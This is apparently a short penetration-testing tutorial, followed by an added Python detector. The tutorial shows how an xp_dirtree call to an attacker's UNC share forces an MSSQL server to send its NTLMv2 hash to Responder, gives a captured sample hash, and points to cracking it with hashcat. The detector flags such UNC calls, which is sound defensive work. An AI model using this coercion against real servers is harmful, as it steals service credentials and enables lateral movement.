Stealing MSSQL Service Cred

Hi everyone

Today I am going to share an interesting way to steal MSSQL service account credentials. Someday you may get stuck during a penetration test even though you have a compromised MSSQL server credential, for example because you cannot find any interesting information in the database. In this tutorial, I will share another simple idea for when you get stuck.

Another thing to do when you get stuck is to steal the MSSQL service account's credentials, which may be useful for lateral movement. The attack uses the xp_dirtree functionality to browse a share on your attacking machine, which is running Responder; this forces the server to authenticate and hand over its authentication token.

XP_DIRTREE

Example:
SQL> xp_dirtree 'C:\Users',0,1;

xp_dirtree has three parameters:

  1. directory – This is the directory you pass when you call the stored procedure.
  2. depth – This tells the stored procedure how many subfolder levels to display. The default of 0 will display all subfolders.
  3. file – This tells the stored procedure whether to display files as well as each folder. The default of 0 will not display any files.

You can also use xp_dirtree to browse a UNC path, for example:

SQL> xp_dirtree '\\10.10.14.3\rio'

With that capability, you can run Responder on your attacker machine to capture the token:

[SMB] NTLMv2-SSP Client   : 192.168.2.19
[SMB] NTLMv2-SSP Username : RIO-SERVER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::RIO-SERVER:289968fad4d78dd3:E17B1EAFFEB1C5C10E592B9183112AE9:0101000000000000C0653150DE09D20161ED4A9AEC7A34ED000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000AB3E23C5E851A2FE97C9C868B5C33C0B6909534D1F15CD7272C67F3AAFA95D950A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003300000000000000000000000000

With that hash, you can then run hashcat with hash type 5600 to crack it. Happy cracking ..
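How the xp_dirtree calls shown above can be spotted in captured SQL statement text, as an added example that is not part of the original post: it flags calls whose path argument is a UNC path to a host outside an allowlist, and marks calls with a run-time path for review. The (login, statement) event format, the login names and the host fileserver01 are assumptions made for the example.

```python
import re

# xp_dirtree call followed by either a string literal or a variable argument.
CALL_RE = re.compile(r"\bxp_dirtree\b\s*(?:N?'((?:[^']|'')*)'|(@\w+))", re.IGNORECASE)
# UNC path: two leading slashes (either direction), then the remote host name.
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)")

def classify_statement(sql, allowed_hosts=frozenset()):
    """Return a (verdict, detail) pair for every xp_dirtree call in sql.

    allowed_hosts must contain lower-case host names.
    """
    results = []
    for literal, variable in CALL_RE.findall(sql):
        if variable:
            # Path is built at run time; static inspection cannot resolve it.
            results.append(("review", variable))
            continue
        unc = UNC_RE.match(literal)
        if not unc:
            results.append(("local", literal))
        elif unc.group(1).lower() in allowed_hosts:
            results.append(("allowed", unc.group(1)))
        else:
            results.append(("alert", unc.group(1)))
    return results

def scan(events, allowed_hosts=frozenset()):
    """Return (login, verdict, detail) for calls that need attention."""
    hits = []
    for login, sql in events:
        for verdict, detail in classify_statement(sql, allowed_hosts):
            if verdict in ("alert", "review"):
                hits.append((login, verdict, detail))
    return hits

# Constructed sample events (login, statement text); not real audit data.
SAMPLE_EVENTS = [
    ("app_ro", r"xp_dirtree 'C:\Users',0,1;"),
    ("app_ro", r"xp_dirtree '\\10.10.14.3\rio'"),
    ("backup_job", r"EXEC master..xp_dirtree N'\\fileserver01\backups', 1, 1"),
    ("app_ro", r"DECLARE @p nvarchar(260) = '\\' + @h; EXEC master.dbo.xp_dirtree @p"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS, allowed_hosts={"fileserver01"}):
        print(hit)
```

Statement text assembled inside dynamic SQL strings is not parsed here, so pairing this check with an outbound SMB block from the database server covers the cases it misses.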
